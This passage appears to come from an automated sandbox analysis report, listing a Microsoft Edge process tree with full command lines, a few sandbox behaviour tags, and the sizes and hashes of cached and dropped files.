C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2160,9318669571389617521,1121500821282271674,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5536 /prefetch:85⤵PID:1052
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9318669571389617521,1121500821282271674,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5548 /prefetch:15⤵PID:4020
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9318669571389617521,1121500821282271674,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5892 /prefetch:15⤵PID:3044
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2160,9318669571389617521,1121500821282271674,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5808 /prefetch:85⤵PID:296
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings5⤵
- Drops file in Program Files directory
PID:3904 -
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff76bc35460,0x7ff76bc35470,0x7ff76bc354806⤵PID:4644
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2160,9318669571389617521,1121500821282271674,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5808 /prefetch:85⤵
- Suspicious behavior: EnumeratesProcesses
PID:3560
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9318669571389617521,1121500821282271674,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5428 /prefetch:15⤵PID:5152
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9318669571389617521,1121500821282271674,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2668 /prefetch:15⤵PID:5936
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2160,9318669571389617521,1121500821282271674,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1872 /prefetch:85⤵PID:6032
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2160,9318669571389617521,1121500821282271674,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3128 /prefetch:85⤵PID:6100
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2160,9318669571389617521,1121500821282271674,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4252 /prefetch:85⤵PID:4468
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2160,9318669571389617521,1121500821282271674,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2004 /prefetch:85⤵PID:3304
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2160,9318669571389617521,1121500821282271674,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3180 /prefetch:85⤵PID:4068
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9318669571389617521,1121500821282271674,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3196 /prefetch:15⤵PID:5140
-
-
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:4960
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:240
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_E175CA4A23AAAC6461EA10553A74FCBF
Filesize746B
MD581d472a05cedae0cc51da78438bf403f
SHA12d03defd282a5e467fbaab00e3be5b23487c053b
SHA256152402a3153cf9f7d2d3d9bc4fef13a582cd6ce98e5a18905a11d897fe7a9578
SHA5126c37ad45e6b24077dc765a75ec141e676c4ca272a81643f6050dc8fb8665cab10899d4053c487df2b549fa3e84284765105dacee73fb974efabdf3e117ad236c
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
Filesize727B
MD599accff20ca7c832511f27c37d003496
SHA13533a08c5b884a8a905afb21fbf3b677e0f9b8f1
SHA256af120cebcf520528b95823f7648a2819cc33152235c9bb7f6ab3f1de22b91de9
SHA5124a6b09b06932b470d55006f2789df9b0cbc00fd5696b25c0db0c8c2aca2ffebea1a2eb896ff0d24e1904b190e721f6e8ed93816c205d95a9ec9eda5fdbe1007b
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EC9B1D0ABBD7F98B401D425828828CE_E175CA4A23AAAC6461EA10553A74FCBF
Filesize408B
MD54bc233662a20ece5c8e0f9f60f034706
SHA166ce9b4d9979cdfa16f9b3e9723481c808fd7546
SHA256882cb3cb900a9a6c2f4418960478051c1da22b5d59133645b0a9137ac9a0af3b
SHA5125872542b517c366280309f43d9a154e3a108b287f6073e2d569bb16037f612073187ef945bd591b47244e4e8de7d0d96e475353ff92a9f3f732247c3925a4202
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
Filesize412B
MD5ff9d392d9e2cfff9dc93a21843f56561
SHA1a225ce6da6da80602d8ce3f940e19a72e2186a2b
SHA256234b2a4590d9d1e854add2e055373aa4611643a35a52e6fab686485762c27333
SHA5124fd0030db2f71ebba7d4b9af6ccd58019656a03b8c94ca458dbe7283374ae46b6313ae8576db08b3491c0e7acd4ffaeec10ceffbd4fa4cf30d8a8ca98b0fcade
-
Filesize
3KB
MD549eac8d576681efe19b67231c07795a0
SHA19cd795e11c3078efdd008091f18e86b325f8f892
SHA256331cf86f3fda9e909d1c1521acfa72574f2ce6ff74912012ae75261c0d06846c
SHA512899933bdadfe1e5aaa25302e869031bee84d9931be6a9ee8f1fe9164c2f4cfc27d363a05e31606919b1e6b2d134446935e5c0cd2697c8bd02ec3c59db380d6a8
-
Filesize
3KB
MD549eac8d576681efe19b67231c07795a0
SHA19cd795e11c3078efdd008091f18e86b325f8f892
SHA256331cf86f3fda9e909d1c1521acfa72574f2ce6ff74912012ae75261c0d06846c
SHA512899933bdadfe1e5aaa25302e869031bee84d9931be6a9ee8f1fe9164c2f4cfc27d363a05e31606919b1e6b2d134446935e5c0cd2697c8bd02ec3c59db380d6a8
-
Filesize
3KB
MD549eac8d576681efe19b67231c07795a0
SHA19cd795e11c3078efdd008091f18e86b325f8f892
SHA256331cf86f3fda9e909d1c1521acfa72574f2ce6ff74912012ae75261c0d06846c
SHA512899933bdadfe1e5aaa25302e869031bee84d9931be6a9ee8f1fe9164c2f4cfc27d363a05e31606919b1e6b2d134446935e5c0cd2697c8bd02ec3c59db380d6a8
-
Filesize
1KB
MD5d4187737377edd4a5fddf9ee201f8bfb
SHA1ef8c59d456c2a880fbeaac060629d5060dad072e
SHA2560fc745584c1284541f68a628eb3754a6f0c4c99a91cdfcc698127e96920f265a
SHA512a682e1aa30e437a458ad880e8b8d750267b5111425c938a8d216c4df97c177d9410048d009d2f7827c5df44985bba14610e332aae3b4176efb62f570e7c5a19f
-
Filesize
1KB
MD5d4187737377edd4a5fddf9ee201f8bfb
SHA1ef8c59d456c2a880fbeaac060629d5060dad072e
SHA2560fc745584c1284541f68a628eb3754a6f0c4c99a91cdfcc698127e96920f265a
SHA512a682e1aa30e437a458ad880e8b8d750267b5111425c938a8d216c4df97c177d9410048d009d2f7827c5df44985bba14610e332aae3b4176efb62f570e7c5a19f
-
Filesize
1KB
MD5d4187737377edd4a5fddf9ee201f8bfb
SHA1ef8c59d456c2a880fbeaac060629d5060dad072e
SHA2560fc745584c1284541f68a628eb3754a6f0c4c99a91cdfcc698127e96920f265a
SHA512a682e1aa30e437a458ad880e8b8d750267b5111425c938a8d216c4df97c177d9410048d009d2f7827c5df44985bba14610e332aae3b4176efb62f570e7c5a19f
-
Filesize
50KB
MD519fa3be964d43ee5eaddb1198cb34cfa
SHA108214c36b827979ff393daf669709e516b305e49
SHA256d7d84566e143a0fc4b838db72a58a909966c190a7c3c6eb16d50ca89ab11b373
SHA5127c0b1200027e6b9ede998c0bb321ceb5427c4e6325edb79323f078653accf21be189643aaaeb472d24d5b814b9613e54bffabbba728c8f86e35bdfaad9814738
-
Filesize
50KB
MD519fa3be964d43ee5eaddb1198cb34cfa
SHA108214c36b827979ff393daf669709e516b305e49
SHA256d7d84566e143a0fc4b838db72a58a909966c190a7c3c6eb16d50ca89ab11b373
SHA5127c0b1200027e6b9ede998c0bb321ceb5427c4e6325edb79323f078653accf21be189643aaaeb472d24d5b814b9613e54bffabbba728c8f86e35bdfaad9814738
-
Filesize
18.5MB
MD5c864145fe5179f9ba2cf23c9a1a8f015
SHA172cc399cae75f9f82e15cce6d5328bd96fe9176a
SHA256667a209e97f3b043edab5b3b683a819fd0e73aa8025738921c5b0b77bca841a3
SHA51235876624040e1c7929a0330a31c07400cdcb9fa6e0657b3c67026dc5143b5c3ff040663f48cd516da20024a66a5f0250f5783aa138441b62be897cb3cdcde410
-
\??\Volume{06969d78-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{40e1b798-992f-4eab-99b6-1644298cd675}_OnDiskSnapshotProp
Filesize5KB
MD5edbc93e85544b92d4ba07dadf3fbee93
SHA14193b8c9f6ae94e22a6d24295fe63667e330cfcb
SHA2561f521c13c9bca82e130c9db45fe4c1226ecf2bb8a56345bf5484637b9da90ef4
SHA512e2e6474a73c4fd45b7334d82447479932488cddf64df2cc64e0f5bab6fd6130b376b82837881b5ca742c76d2142d0c2f94a0d2a73adc3e3ecbc15fbc3e0c1f1e